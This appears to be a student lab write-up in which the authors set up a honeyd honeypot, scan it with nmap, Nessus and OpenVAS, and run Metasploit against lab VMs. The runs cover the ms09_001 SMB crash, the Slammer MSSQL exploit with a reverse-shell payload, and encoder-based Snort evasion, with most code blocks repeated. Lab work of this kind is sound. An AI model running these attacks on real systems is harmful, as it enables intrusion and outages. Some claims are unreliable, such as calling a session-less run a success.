add windows tcp port 25 "perl scripts/snmp/fake-snmp.pl"
add windows tcp port 23 "perl scripts/telnet/faketelnet.pl"
add windows tcp port 139 open
add windows tcp port 137 open
add windows udp port 137 open
add windows udp port 135 open
set windows default tcp action reset
set windows default udp action reset
bind 145.100.105.197 windows

When I tried to start the fake system, I got the following error:

sudo honeyd -f /etc/honeypot/myfakemachine.conf 145.100.105.197
 
Honeyd V1.5c Copyright (c) 2002-2007 Niels Provos
honeyd[30337]: started with -f /etc/honeypot/myfakemachine.conf 145.100.105.197
honeyd[30337]: listening promiscuously on eth0: (arp or ip proto 47 or (udp and src port 67 and dst port 68) or (ip )) and not ether src 00:16:3e:59:34:7d
/etc/honeypot/honeyd.conf:2: Unknown personality "Windows NT 4.0 Server SP5-SP6"
honeyd: parsing configuration file failed

sudo honeyd -f /etc/honeypot/myfakemachine.conf 145.100.105.197

Honeyd V1.5c Copyright (c) 2002-2007 Niels Provos
honeyd[30337]: started with -f /etc/honeypot/myfakemachine.conf 145.100.105.197
honeyd[30337]: listening promiscuously on eth0: (arp or ip proto 47 or (udp and src port 67 and dst port 68) or (ip )) and not ether src 00:16:3e:59:34:7d
/etc/honeypot/honeyd.conf:2: Unknown personality "Windows NT 4.0 Server SP5-SP6"
honeyd: parsing configuration file failed

I changed the personality to “Microsoft Windows XP Professional”. This solved the problem:

sudo honeyd -f /etc/honeypot/myfakemachine.conf 145.100.105.197
 
Honeyd V1.5c Copyright (c) 2002-2007 Niels Provos
honeyd[30343]: started with -f /etc/honeypot/myfakemachine.conf 145.100.105.197
honeyd[30343]: listening promiscuously on eth0: (arp or ip proto 47 or (udp and src port 67 and dst port 68) or (ip )) and not ether src 00:16:3e:59:34:7d
Honeyd starting as background process

sudo honeyd -f /etc/honeypot/myfakemachine.conf 145.100.105.197

Honeyd V1.5c Copyright (c) 2002-2007 Niels Provos
honeyd[30343]: started with -f /etc/honeypot/myfakemachine.conf 145.100.105.197
honeyd[30343]: listening promiscuously on eth0: (arp or ip proto 47 or (udp and src port 67 and dst port 68) or (ip )) and not ether src 00:16:3e:59:34:7d
Honeyd starting as background process

We tried to ping the machine:

ping 145.100.105.197
PING 145.100.105.197 (145.100.105.197) 56(84) bytes of data.
From 145.100.105.196 icmp_seq=1 Destination Host Unreachable
From 145.100.105.196 icmp_seq=2 Destination Host Unreachable
From 145.100.105.196 icmp_seq=3 Destination Host Unreachable

ping 145.100.105.197
PING 145.100.105.197 (145.100.105.197) 56(84) bytes of data.
From 145.100.105.196 icmp_seq=1 Destination Host Unreachable
From 145.100.105.196 icmp_seq=2 Destination Host Unreachable
From 145.100.105.196 icmp_seq=3 Destination Host Unreachable

But this was not really a great success… We tried to restart everything, double checked all configurations… In the end I tried to ping from another system than my HVM, and that worked just fine!

Scan it with Nmap including version detection.
- Does nmap think that it’s a real device?

To scan for open ports with nmap, we used the following command:

nmap -A -T4 145.100.105.197
 
Starting Nmap 5.00 ( http://nmap.org ) at 2010-04-12 13:08 CEST
Interesting ports on 145.100.105.197:
Not shown: 996 closed ports
PORT    STATE SERVICE      VERSION
23/tcp  open  tcpwrapped
25/tcp  open  tcpwrapped
80/tcp  open  tcpwrapped
139/tcp open  netbios-ssn?
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=5.00%D=4/12%OT=23%CT=1%CU=33139%PV=N%DS=2%G=Y%TM=4BC2FFD4%P=i686-
OS:pc-linux-gnu)SEQ(SP=A0%GCD=1%ISR=A8%TI=I%CI=I%II=I%SS=S%TS=U)OPS(O1=M5B4
OS:NW0%O2=M5B4NW0%O3=M5B4NW0%O4=M5B4NW0%O5=M5B4NW0%O6=M5B4NW0)WIN(W1=F424%W
OS:2=F424%W3=F424%W4=F424%W5=F424%W6=F424)ECN(R=Y%DF=Y%T=40%W=F424%O=M5B4NW
OS:0%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=N%T=40%W=0%S=
OS:A%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=40%W=F424%S=O%A=S+%F=AS%O=M5B4NW0%RD
OS:=0%Q=)T3(R=Y%DF=Y%T=40%W=F424%S=O%A=O%F=AS%O=M5B4NW0%RD=0%Q=)T4(R=Y%DF=N
OS:%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T=40%W=0%S=A%A=S+%F=AR%O=%R
OS:D=0%Q=)T6(R=Y%DF=N%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=N%T=40%W=0%
OS:S=A%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=38%UN=0%RIPL=G%RID=G%RIPCK
OS:=G%RUCK=G%RUD=G)IE(R=Y%DFI=Y%T=80%CD=Z)
 
Network Distance: 2 hops
 
Host script results:
|_ nbstat: ERROR: Name query failed: TIMEOUT
 
TRACEROUTE (using port 587/tcp)
HOP RTT  ADDRESS
1   1.42 router.students.os3.nl (145.100.102.129)
2   0.23 spearow.studlab.os3.nl (145.100.104.21)
3   0.90 145.100.105.197
 
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 186.52 seconds

nmap -A -T4 145.100.105.197

Starting Nmap 5.00 ( http://nmap.org ) at 2010-04-12 13:08 CEST
Interesting ports on 145.100.105.197:
Not shown: 996 closed ports
PORT    STATE SERVICE      VERSION
23/tcp  open  tcpwrapped
25/tcp  open  tcpwrapped
80/tcp  open  tcpwrapped
139/tcp open  netbios-ssn?
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=5.00%D=4/12%OT=23%CT=1%CU=33139%PV=N%DS=2%G=Y%TM=4BC2FFD4%P=i686-
OS:pc-linux-gnu)SEQ(SP=A0%GCD=1%ISR=A8%TI=I%CI=I%II=I%SS=S%TS=U)OPS(O1=M5B4
OS:NW0%O2=M5B4NW0%O3=M5B4NW0%O4=M5B4NW0%O5=M5B4NW0%O6=M5B4NW0)WIN(W1=F424%W
OS:2=F424%W3=F424%W4=F424%W5=F424%W6=F424)ECN(R=Y%DF=Y%T=40%W=F424%O=M5B4NW
OS:0%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=N%T=40%W=0%S=
OS:A%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=40%W=F424%S=O%A=S+%F=AS%O=M5B4NW0%RD
OS:=0%Q=)T3(R=Y%DF=Y%T=40%W=F424%S=O%A=O%F=AS%O=M5B4NW0%RD=0%Q=)T4(R=Y%DF=N
OS:%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T=40%W=0%S=A%A=S+%F=AR%O=%R
OS:D=0%Q=)T6(R=Y%DF=N%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=N%T=40%W=0%
OS:S=A%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=38%UN=0%RIPL=G%RID=G%RIPCK
OS:=G%RUCK=G%RUD=G)IE(R=Y%DFI=Y%T=80%CD=Z)

Network Distance: 2 hops

Host script results:
|_ nbstat: ERROR: Name query failed: TIMEOUT

TRACEROUTE (using port 587/tcp)
HOP RTT  ADDRESS
1   1.42 router.students.os3.nl (145.100.102.129)
2   0.23 spearow.studlab.os3.nl (145.100.104.21)
3   0.90 145.100.105.197

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 186.52 seconds

-A: This parameter enables version detection
-T4: This parameter is for faster execution

An attacker could think that this is a fake device, because the OS is not being recognized by nmap.

Scan it with Nessus and OpenVAS.
- Do Nesses and OpenVAS think that it’s a real device?

/opt/nessus/bin/nessuscmd -q 145.100.105.197
Starting nessuscmd 4.2.1
Scanning '145.100.105.197'...
 
+ Results found on 145.100.105.197 :
   - Port telnet (23/tcp) is open
   - Port smtp (25/tcp) is open
   - Port http (80/tcp) is open
   - Port netbios-ns (137/tcp) is open
   - Port netbios-ssn (139/tcp) is open

/opt/nessus/bin/nessuscmd -q 145.100.105.197
Starting nessuscmd 4.2.1
Scanning '145.100.105.197'...

+ Results found on 145.100.105.197 :
   - Port telnet (23/tcp) is open
   - Port smtp (25/tcp) is open
   - Port http (80/tcp) is open
   - Port netbios-ns (137/tcp) is open
   - Port netbios-ssn (139/tcp) is open

sudo openvassd
All plugins loaded
sudo echo "145.100.105.196" >> iptoscan.txt
sudo OpenVAS-Client -q 127.0.0.1 9390 jeroen ids iptoscan.txt scanresults2.html -T html

sudo openvassd
All plugins loaded
sudo echo "145.100.105.196" >> iptoscan.txt
sudo OpenVAS-Client -q 127.0.0.1 9390 jeroen ids iptoscan.txt scanresults2.html -T html

Both vulnerability scanners do not detect that it is a virtual machine. The only related thing that OpenVAS detects is that the OS is unknown.

Vulnerability testing:
- Install Metasploit http://www.metasploit.com/framework/

We downloaded the metaploit framework from:

1	http://www.metasploit.com/framework/download/

http://www.metasploit.com/framework/download/

Then we installed the framework:

sudo sh framework-3.3.3-linux-i686.run 
 
This installer will place Metasploit into the /opt/metasploit3 directory.
Continue (yes/no) > yes
Would you like to automatically update Metasploit?
AutoUpdate? (yes/no) > yes
Would you like to update Metasploit right now?
Update? (yes/no) > yes
 
sudo msfconsole

sudo sh framework-3.3.3-linux-i686.run 

This installer will place Metasploit into the /opt/metasploit3 directory.
Continue (yes/no) > yes
Would you like to automatically update Metasploit?
AutoUpdate? (yes/no) > yes
Would you like to update Metasploit right now?
Update? (yes/no) > yes

sudo msfconsole

Try to exploit the weaknesses that are found with Nessus and OpenVAS.

We scanned a Windows 2003 Server for vulnerabilities. We enabled the following services:

RPC
Server
Netbios

Nessus gave the following results:

/opt/nessus/bin/nessuscmd 145.100.105.213
Starting nessuscmd 4.2.1
Scanning '145.100.105.213'...
 
+ Results found on 145.100.105.213 :
   - Port epmap (135/tcp) is open
   - Port netbios-ssn (139/tcp) is open
   - Port microsoft-ds (445/tcp) is open
   - Port blackjack (1025/tcp) is open
   - Port cap (1026/tcp) is open

/opt/nessus/bin/nessuscmd 145.100.105.213
Starting nessuscmd 4.2.1
Scanning '145.100.105.213'...

+ Results found on 145.100.105.213 :
   - Port epmap (135/tcp) is open
   - Port netbios-ssn (139/tcp) is open
   - Port microsoft-ds (445/tcp) is open
   - Port blackjack (1025/tcp) is open
   - Port cap (1026/tcp) is open

The OpenVAS scan resulted in this:

As you can, 2 vulnerabilities were found:

The first one is a rather well-known vulnerability, and is thereby also known by metasploit:

msf > search ms09_001
[*] Searching loaded modules for pattern 'ms09_001'...
 
Auxiliary
=========
 
   Name                            Rank    Description
   ----                            ----    -----------
   dos/windows/smb/ms09_001_write  normal  Microsoft SRV.SYS WriteAndX Invalid DataOffset

msf > search ms09_001
[*] Searching loaded modules for pattern 'ms09_001'...

Auxiliary
=========

   Name                            Rank    Description
   ----                            ----    -----------
   dos/windows/smb/ms09_001_write  normal  Microsoft SRV.SYS WriteAndX Invalid DataOffset

We tried to exploit this by doing the following in msfconsole:

msf > use auxiliary/dos/windows/smb/ms09_001_write
msf auxiliary(ms09_001_write) > set RHOST 145.100.105.213
RHOST => 145.100.105.213
msf auxiliary(ms09_001_write) > run
 
Attempting to crash the remote host...
datalenlow=65535 dataoffset=65535 fillersize=72
datalenlow=55535 dataoffset=65535 fillersize=72
datalenlow=45535 dataoffset=65535 fillersize=72
datalenlow=35535 dataoffset=65535 fillersize=72
datalenlow=25535 dataoffset=65535 fillersize=72
datalenlow=15535 dataoffset=65535 fillersize=72
datalenlow=65535 dataoffset=55535 fillersize=72
datalenlow=55535 dataoffset=55535 fillersize=72
datalenlow=45535 dataoffset=55535 fillersize=72
datalenlow=35535 dataoffset=55535 fillersize=72
datalenlow=25535 dataoffset=55535 fillersize=72
datalenlow=15535 dataoffset=55535 fillersize=72
datalenlow=65535 dataoffset=45535 fillersize=72
datalenlow=55535 dataoffset=45535 fillersize=72
datalenlow=45535 dataoffset=45535 fillersize=72
datalenlow=35535 dataoffset=45535 fillersize=72
datalenlow=25535 dataoffset=45535 fillersize=72
datalenlow=15535 dataoffset=45535 fillersize=72
datalenlow=65535 dataoffset=35535 fillersize=72
datalenlow=55535 dataoffset=35535 fillersize=72
datalenlow=45535 dataoffset=35535 fillersize=72
datalenlow=35535 dataoffset=35535 fillersize=72
datalenlow=25535 dataoffset=35535 fillersize=72
datalenlow=15535 dataoffset=35535 fillersize=72
datalenlow=65535 dataoffset=25535 fillersize=72
datalenlow=55535 dataoffset=25535 fillersize=72
datalenlow=45535 dataoffset=25535 fillersize=72
datalenlow=35535 dataoffset=25535 fillersize=72
datalenlow=25535 dataoffset=25535 fillersize=72
datalenlow=15535 dataoffset=25535 fillersize=72
datalenlow=65535 dataoffset=15535 fillersize=72
datalenlow=55535 dataoffset=15535 fillersize=72
datalenlow=45535 dataoffset=15535 fillersize=72
datalenlow=35535 dataoffset=15535 fillersize=72
datalenlow=25535 dataoffset=15535 fillersize=72
datalenlow=15535 dataoffset=15535 fillersize=72
[*] Auxiliary module execution completed
msf auxiliary(ms09_001_write) >

msf > use auxiliary/dos/windows/smb/ms09_001_write
msf auxiliary(ms09_001_write) > set RHOST 145.100.105.213
RHOST => 145.100.105.213
msf auxiliary(ms09_001_write) > run

Attempting to crash the remote host...
datalenlow=65535 dataoffset=65535 fillersize=72
datalenlow=55535 dataoffset=65535 fillersize=72
datalenlow=45535 dataoffset=65535 fillersize=72
datalenlow=35535 dataoffset=65535 fillersize=72
datalenlow=25535 dataoffset=65535 fillersize=72
datalenlow=15535 dataoffset=65535 fillersize=72
datalenlow=65535 dataoffset=55535 fillersize=72
datalenlow=55535 dataoffset=55535 fillersize=72
datalenlow=45535 dataoffset=55535 fillersize=72
datalenlow=35535 dataoffset=55535 fillersize=72
datalenlow=25535 dataoffset=55535 fillersize=72
datalenlow=15535 dataoffset=55535 fillersize=72
datalenlow=65535 dataoffset=45535 fillersize=72
datalenlow=55535 dataoffset=45535 fillersize=72
datalenlow=45535 dataoffset=45535 fillersize=72
datalenlow=35535 dataoffset=45535 fillersize=72
datalenlow=25535 dataoffset=45535 fillersize=72
datalenlow=15535 dataoffset=45535 fillersize=72
datalenlow=65535 dataoffset=35535 fillersize=72
datalenlow=55535 dataoffset=35535 fillersize=72
datalenlow=45535 dataoffset=35535 fillersize=72
datalenlow=35535 dataoffset=35535 fillersize=72
datalenlow=25535 dataoffset=35535 fillersize=72
datalenlow=15535 dataoffset=35535 fillersize=72
datalenlow=65535 dataoffset=25535 fillersize=72
datalenlow=55535 dataoffset=25535 fillersize=72
datalenlow=45535 dataoffset=25535 fillersize=72
datalenlow=35535 dataoffset=25535 fillersize=72
datalenlow=25535 dataoffset=25535 fillersize=72
datalenlow=15535 dataoffset=25535 fillersize=72
datalenlow=65535 dataoffset=15535 fillersize=72
datalenlow=55535 dataoffset=15535 fillersize=72
datalenlow=45535 dataoffset=15535 fillersize=72
datalenlow=35535 dataoffset=15535 fillersize=72
datalenlow=25535 dataoffset=15535 fillersize=72
datalenlow=15535 dataoffset=15535 fillersize=72
[*] Auxiliary module execution completed
msf auxiliary(ms09_001_write) >

While exploiting this vulnerability I checked the snort rules> I gave me a lot of output, all similar to the records below:

[**] [1:2465:7] NETBIOS SMB-DS IPC$ share access [**]
[Classification: Generic Protocol Command Decode] [Priority: 3]
04/21-15:53:22.055795 145.100.102.131:60094 -> 145.100.105.213:445
TCP TTL:63 TOS:0x0 ID:23121 IpLen:20 DgmLen:129 DF
***AP*** Seq: 0xC09C71C9  Ack: 0xFB04529A  Win: 0x6C  TcpLen: 32
TCP Options (3) => NOP NOP TS: 5387669 6519 
 
[**] [1:2465:7] NETBIOS SMB-DS IPC$ share access [**]
[Classification: Generic Protocol Command Decode] [Priority: 3]
04/21-15:53:22.225651 145.100.102.131:57008 -> 145.100.105.213:445
TCP TTL:63 TOS:0x0 ID:54200 IpLen:20 DgmLen:129 DF
***AP*** Seq: 0xC067E8AA  Ack: 0xBE5EFED  Win: 0x6C  TcpLen: 32
TCP Options (3) => NOP NOP TS: 5387711 6521
...
...
...
 
[**] [1:2465:7] NETBIOS SMB-DS IPC$ share access [**]
[Classification: Generic Protocol Command Decode] [Priority: 3]
04/21-15:53:28.856311 145.100.102.131:51774 -> 145.100.105.213:445
TCP TTL:63 TOS:0x0 ID:9359 IpLen:20 DgmLen:129 DF
***AP*** Seq: 0xC65D1B40  Ack: 0x5842F684  Win: 0x6C  TcpLen: 32
TCP Options (3) => NOP NOP TS: 5389369 6587 
 
[**] [1:2465:7] NETBIOS SMB-DS IPC$ share access [**]
[Classification: Generic Protocol Command Decode] [Priority: 3]
04/21-15:53:29.006929 145.100.102.131:46062 -> 145.100.105.213:445
TCP TTL:63 TOS:0x0 ID:23546 IpLen:20 DgmLen:129 DF
***AP*** Seq: 0xC6B16A51  Ack: 0x7395A1E4  Win: 0x6C  TcpLen: 32
TCP Options (3) => NOP NOP TS: 5389407 6589

[**] [1:2465:7] NETBIOS SMB-DS IPC$ share access [**]
[Classification: Generic Protocol Command Decode] [Priority: 3]
04/21-15:53:22.055795 145.100.102.131:60094 -> 145.100.105.213:445
TCP TTL:63 TOS:0x0 ID:23121 IpLen:20 DgmLen:129 DF
***AP*** Seq: 0xC09C71C9  Ack: 0xFB04529A  Win: 0x6C  TcpLen: 32
TCP Options (3) => NOP NOP TS: 5387669 6519 

[**] [1:2465:7] NETBIOS SMB-DS IPC$ share access [**]
[Classification: Generic Protocol Command Decode] [Priority: 3]
04/21-15:53:22.225651 145.100.102.131:57008 -> 145.100.105.213:445
TCP TTL:63 TOS:0x0 ID:54200 IpLen:20 DgmLen:129 DF
***AP*** Seq: 0xC067E8AA  Ack: 0xBE5EFED  Win: 0x6C  TcpLen: 32
TCP Options (3) => NOP NOP TS: 5387711 6521
...
...
...

[**] [1:2465:7] NETBIOS SMB-DS IPC$ share access [**]
[Classification: Generic Protocol Command Decode] [Priority: 3]
04/21-15:53:28.856311 145.100.102.131:51774 -> 145.100.105.213:445
TCP TTL:63 TOS:0x0 ID:9359 IpLen:20 DgmLen:129 DF
***AP*** Seq: 0xC65D1B40  Ack: 0x5842F684  Win: 0x6C  TcpLen: 32
TCP Options (3) => NOP NOP TS: 5389369 6587 

[**] [1:2465:7] NETBIOS SMB-DS IPC$ share access [**]
[Classification: Generic Protocol Command Decode] [Priority: 3]
04/21-15:53:29.006929 145.100.102.131:46062 -> 145.100.105.213:445
TCP TTL:63 TOS:0x0 ID:23546 IpLen:20 DgmLen:129 DF
***AP*** Seq: 0xC6B16A51  Ack: 0x7395A1E4  Win: 0x6C  TcpLen: 32
TCP Options (3) => NOP NOP TS: 5389407 6589

More information about this exploit: http://www.metasploit.com/modules/auxiliary/dos/windows/smb/ms09_001_write

Launch a well known UDP based MSSQL attack against you VM.
- Doesn’t matter whether MSSQL is installed or not.

We tried a few other exploits first, but they did not work out. This is because those attacks were TCP based, while the following is UDP based:

msf > use windows/mssql/ms02_039_slammer
msf exploit(ms02_039_slammer) > show options
 
Module options:
 
   Name        Current Setting                                Required  Description
   ----        ---------------                                --------  -----------
   HEX2BINARY  /opt/metasploit3/msf3/data/exploits/mssql/h2b  no        The path to the hex2binary script on the disk
   MSSQL_PASS                                                 no        The password for the specified username
   MSSQL_USER  sa                                             no        The username to authenticate as
   RHOST                                                      yes       The target address
   RPORT       1434                                           yes       The target port
 
Exploit target:
 
   Id  Name
   --  ----
   0   MSSQL 2000 / MSDE <= SP2
 
msf exploit(ms02_039_slammer) > set rhost 145.100.105.196
rhost => 145.100.105.196
msf exploit(ms02_039_slammer) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms02_039_slammer) > set lhost 145.100.102.131
lhost => 145.100.102.131
msf exploit(ms02_039_slammer) > show options
 
Module options:
 
   Name        Current Setting                                Required  Description
   ----        ---------------                                --------  -----------
   HEX2BINARY  /opt/metasploit3/msf3/data/exploits/mssql/h2b  no        The path to the hex2binary script on the disk
   MSSQL_PASS                                                 no        The password for the specified username
   MSSQL_USER  sa                                             no        The username to authenticate as
   RHOST       145.100.105.196                                yes       The target address
   RPORT       1434                                           yes       The target port
 
Payload options (windows/shell/reverse_tcp):
 
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     145.100.102.131  yes       The local address
   LPORT     4444             yes       The local port
 
Exploit target:
 
   Id  Name
   --  ----
   0   MSSQL 2000 / MSDE <= SP2
 
msf exploit(ms02_039_slammer) > exploit
 
[*] Started reverse handler on port 4444
[*] Sending UDP packet with return address 0x42b48774
[*] Execute 'net start sqlserveragent' once access is obtained
[*] Exploit completed, but no session was created.

msf > use windows/mssql/ms02_039_slammer
msf exploit(ms02_039_slammer) > show options

Module options:

   Name        Current Setting                                Required  Description
   ----        ---------------                                --------  -----------
   HEX2BINARY  /opt/metasploit3/msf3/data/exploits/mssql/h2b  no        The path to the hex2binary script on the disk
   MSSQL_PASS                                                 no        The password for the specified username
   MSSQL_USER  sa                                             no        The username to authenticate as
   RHOST                                                      yes       The target address
   RPORT       1434                                           yes       The target port

Exploit target:

   Id  Name
   --  ----
   0   MSSQL 2000 / MSDE <= SP2

msf exploit(ms02_039_slammer) > set rhost 145.100.105.196
rhost => 145.100.105.196
msf exploit(ms02_039_slammer) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms02_039_slammer) > set lhost 145.100.102.131
lhost => 145.100.102.131
msf exploit(ms02_039_slammer) > show options

Module options:

   Name        Current Setting                                Required  Description
   ----        ---------------                                --------  -----------
   HEX2BINARY  /opt/metasploit3/msf3/data/exploits/mssql/h2b  no        The path to the hex2binary script on the disk
   MSSQL_PASS                                                 no        The password for the specified username
   MSSQL_USER  sa                                             no        The username to authenticate as
   RHOST       145.100.105.196                                yes       The target address
   RPORT       1434                                           yes       The target port

Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     145.100.102.131  yes       The local address
   LPORT     4444             yes       The local port

Exploit target:

   Id  Name
   --  ----
   0   MSSQL 2000 / MSDE <= SP2

msf exploit(ms02_039_slammer) > exploit

[*] Started reverse handler on port 4444
[*] Sending UDP packet with return address 0x42b48774
[*] Execute 'net start sqlserveragent' once access is obtained
[*] Exploit completed, but no session was created.

This exploit succeeded!

Is this action detected by Snort?

No nothing was detected by snort.

Try different encoders using Metasploit evasion options / msfencode.
- what is Snort telling you?

msf > use windows/mssql/ms02_039_slammer
msf exploit(ms02_039_slammer) > set rhost 145.100.105.196
rhost => 145.100.105.196
msf exploit(ms02_039_slammer) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms02_039_slammer) > set encoder x86/shikata_ga_nai
encoder => x86/shikata_ga_nai
msf exploit(ms02_039_slammer) > set EnableContextEncoding 1
EnableContextEncoding => 1
msf exploit(ms02_039_slammer) > set ContectInformationFile application.map
ContectInformationFile => application.map
msf exploit(ms02_039_slammer) > set lhost 145.100.102.131
lhost => 145.100.102.131
msf exploit(ms02_039_slammer) > exploit
 
[-] Exploit failed: No encoders encoded the buffer successfully.
[*] Exploit completed, but no session was created.

msf > use windows/mssql/ms02_039_slammer
msf exploit(ms02_039_slammer) > set rhost 145.100.105.196
rhost => 145.100.105.196
msf exploit(ms02_039_slammer) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(ms02_039_slammer) > set encoder x86/shikata_ga_nai
encoder => x86/shikata_ga_nai
msf exploit(ms02_039_slammer) > set EnableContextEncoding 1
EnableContextEncoding => 1
msf exploit(ms02_039_slammer) > set ContectInformationFile application.map
ContectInformationFile => application.map
msf exploit(ms02_039_slammer) > set lhost 145.100.102.131
lhost => 145.100.102.131
msf exploit(ms02_039_slammer) > exploit

[-] Exploit failed: No encoders encoded the buffer successfully.
[*] Exploit completed, but no session was created.

The error means the following: The payloads available are determined by the memory ‘Space’ available for the exploit to use.

msf exploit(ms02_039_slammer) > info
 
       Name: Microsoft SQL Server Resolution Overflow
    Version: 7724
   Platform: Windows
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Good
 
Provided by:
  hdm <hdm@metasploit.com>
 
Available targets:
  Id  Name
  --  ----
  0   MSSQL 2000 / MSDE <= SP2
 
Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  PASSWORD                   no        The password for the specified username
  RHOST     145.100.105.196  yes       The target address
  RPORT     1434             yes       The target port
  USERNAME  sa               no        The username to authenticate as
 
Payload information:
  Space: 512
  Avoid: 6 characters
 
Description:
  This is an exploit for the SQL Server 2000 resolution service buffer
  overflow. This overflow is triggered by sending a udp packet to port
  1434 which starts with 0x04 and is followed by long string
  terminating with a colon and a number. This module should work
  against any vulnerable SQL Server 2000 or MSDE install (pre-SP3).
 
References:
 
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649
 
http://www.osvdb.org/4578
 
http://www.securityfocus.com/bid/5310
 
http://www.microsoft.com/technet/security/bulletin/MS02-039.mspx

msf exploit(ms02_039_slammer) > info

       Name: Microsoft SQL Server Resolution Overflow
    Version: 7724
   Platform: Windows
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Good

Provided by:
  hdm <hdm@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   MSSQL 2000 / MSDE <= SP2

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  PASSWORD                   no        The password for the specified username
  RHOST     145.100.105.196  yes       The target address
  RPORT     1434             yes       The target port
  USERNAME  sa               no        The username to authenticate as

Payload information:
  Space: 512
  Avoid: 6 characters

Description:
  This is an exploit for the SQL Server 2000 resolution service buffer
  overflow. This overflow is triggered by sending a udp packet to port
  1434 which starts with 0x04 and is followed by long string
  terminating with a colon and a number. This module should work
  against any vulnerable SQL Server 2000 or MSDE install (pre-SP3).

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2002-0649

http://www.osvdb.org/4578

http://www.securityfocus.com/bid/5310

http://www.microsoft.com/technet/security/bulletin/MS02-039.mspx

Here, the payload space is: ‘Space: 500′. However, the target application does not allow certain characters to be used (usually the null character 0×00 as this denotes the end of a string [character array]). The payload cannot permit six characters: ‘Avoid: 6 characters ‘ When we run the exploit, the payload generators will attempt to fit our desired payload into a space of 500 which excludes 6 specific characters. This is not always possible, and will result in the error: No encoders encoded the buffer successfully. I tried a few other payloads, but this resulted in nothing.
< Source >